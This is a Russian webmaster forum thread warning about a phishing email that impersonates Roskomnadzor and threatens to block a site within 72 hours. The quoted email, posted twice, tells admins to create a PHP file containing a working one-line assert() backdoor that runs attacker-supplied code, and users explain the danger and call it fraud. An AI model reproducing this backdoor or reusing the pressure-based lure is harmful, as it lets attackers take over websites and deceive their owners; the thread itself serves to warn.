Jump to content
Sign in to follow this  
rafonets

Как взломать СВОЙ сайт за 72 часа

Recommended Posts

Отправитель: zapret-info@roskomnadzor.org

Получатель: adv@saitebi.biz

 

С roskomnadzor.org идет 301 редирект на нужный сайт в зоне gov.ru

 

Сообщение:

 

bf4f7-clip-89kb.png?nocache=1

 

 

Цитата из php.net:

 

 

bool assert ( mixed $assertion [, string $description ] )
Если assertion задается в виде строки, оно будет рассматриваться функцией assert() как PHP код

 

Для непонятливых, внедрив этот код в сайт, злоумышленник сможет выполнить любой PHP код на Вашем сайте)) В точности загрузить Шеллы, разместить рекламу и все прочее.

 

 

Всем удачи,

rafonets

 

Share this post


Link to post
Share on other sites

Я бы еще текст из письма текстом разместил - так сообщение (и информацию к сведению) прочитало бы больше аудитории

Share this post


Link to post
Share on other sites

Я бы еще текст из письма текстом разместил - так сообщение (и информацию к сведению) прочитало бы больше аудитории

Пытался, не получилось ... 

 

Выводило ошибку: "Ошибка загрузки расширения файла" - или как-то так. Там некоторые символы на английские заменены и т.д. Видимо предусмотрели заранее... Хотя..., попробую вот так:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени saitebi.biz в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтsaitebi.biz был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени saitebi.biz, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени saitebi.biz*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: saitebi.biz/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени saitebi.biz, следую инструкции указанной выше, то Ваш сайт saitebi.biz будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Share this post


Link to post
Share on other sites

Прикольная замануха) надо проверить на знакомых, на сколько они доверчивы всякой такой ерунде)

у вас ссылка битая в подписи)

Share this post


Link to post
Share on other sites

Ой, да всякое приходит. То лицензию купите, то купили она не правильный код при проверки отдаёт. То найдена новая дыра на сайте, залатайте и код.

Только у вас смотрю сложный какой-то. Обычно строка приходит, которую вставить нужно.

Share this post


Link to post
Share on other sites

Это обман, чистой воды. Прикидываются Роскомнадзорам и через специальный код получают возможность размещать на Вашем сайте все, что им вздумается. Уже, чтобы с ними разобраться, направили обращения в ФСБ и МВД. На самых разных IT-сайтах читал такие новости. Так что ни в коем случае не отвечайте и не размещайте вредоносный код. Причем, это уже не первая подобная "акция" в этом году.

Share this post


Link to post
Share on other sites

Самое ппечальное то, что некоторые, а то и многие, обделаются и разместят код, даже не разобравшись что это за код. Ведь тут фишка в том, что психологически давят федеральной службой и человек забывает о том, что это может быть фейк :(

 

Умно, ничего не скажешь. Скоро, якобы, от ФСБ будут рассылки делать :)

Share this post


Link to post
Share on other sites

Самое ппечальное то, что некоторые, а то и многие, обделаются и разместят код, даже не разобравшись что это за код. Ведь тут фишка в том, что психологически давят федеральной службой и человек забывает о том, что это может быть фейк :(

 

Умно, ничего не скажешь. Скоро, якобы, от ФСБ будут рассылки делать :)

direkt-yandex.ru - закажите рекламу в яндексе или Вам светит АГС  B)

 

Подсказку дал, нужен домен, сайт, форма оплаты и рассылка спама, умно написанного спама  :D  Куда проще чем какие-то коды внедрять в сайты, особенно, если посещаемость сайта 1400, а они пишут, больше 3000 и каталог сайтов превращают в блог.

 

UPD: лень стало писать бота, который бы чекнул запрос к папке и нужному файлу и заблочил бы IP + посмотрел бы какой код внедряют и что делают ), а надо было ).

Edited by rafonets

Share this post


Link to post
Share on other sites

direkt-yandex.ru - закажите рекламу в яндексе или Вам светит АГС  B)

 

Подсказку дал, нужен домен, сайт, форма оплаты и рассылка спама, умно написанного спама  :D  Куда проще чем какие-то коды внедрять в сайты, особенно, если посещаемость сайта 1400, а они пишут, больше 3000 и каталог сайтов превращают в блог.

 

UPD: лень стало писать бота, который бы чекнул запрос к папке и нужному файлу и заблочил бы IP + посмотрел бы какой код внедряют и что делают ), а надо было ).

Ну да. Или yandeks.ru или gogle.ru

 

Да по e-mail фигня всё это. Если Вы реально будете что-либо делать, что Вами заинтересуются службы, то Вас вызовут повесткой и сайт будет заблокирован без предупреждения. А так, не обращайте внимания ;)

Share this post


Link to post
Share on other sites

Ну да. Или yandeks.ru или gogle.ru

 

Да по e-mail фигня всё это. Если Вы реально будете что-либо делать, что Вами заинтересуются службы, то Вас вызовут повесткой и сайт будет заблокирован без предупреждения. А так, не обращайте внимания ;)

Перефразирую, вообщем, если понадобится Вас из под земли достанут, а не на эмайл спамить будут. Ошибка в том, что они не написали хостеру , вторая ошибка сообщение отправили на мыло указанное на сайте, а не в войс и третья не написали регистратору домена. Вообщем-то еще раз, им еще учиться и учиться...

Share this post


Link to post
Share on other sites

 

Пытался, не получилось ... 

 

Выводило ошибку: "Ошибка загрузки расширения файла" - или как-то так. Там некоторые символы на английские заменены и т.д. Видимо предусмотрели заранее... Хотя..., попробую вот так:

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени saitebi.biz в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайтsaitebi.biz был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени saitebi.biz, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени saitebi.biz*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: saitebi.biz/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени saitebi.biz, следую инструкции указанной выше, то Ваш сайт saitebi.biz будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

А сколько же веб-мастеров самоделкиных, которые сами пытаются что-то создать похожее на сайт своими руками, а потом получают такие письма и конечно же размещают все что им говорят на своих сайтах. Вот на таких просточков и рассчитывают мошенники.

Share this post


Link to post
Share on other sites

Мой хостинг, прислал уведомление, что это мошенничество всё!

470986feefcd1938f89fa40e52eccc7f.png

Мне тоже что-то подобное Бегет присылал.

А некоторые реально могут на это повестись, как сказал человек выше)

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...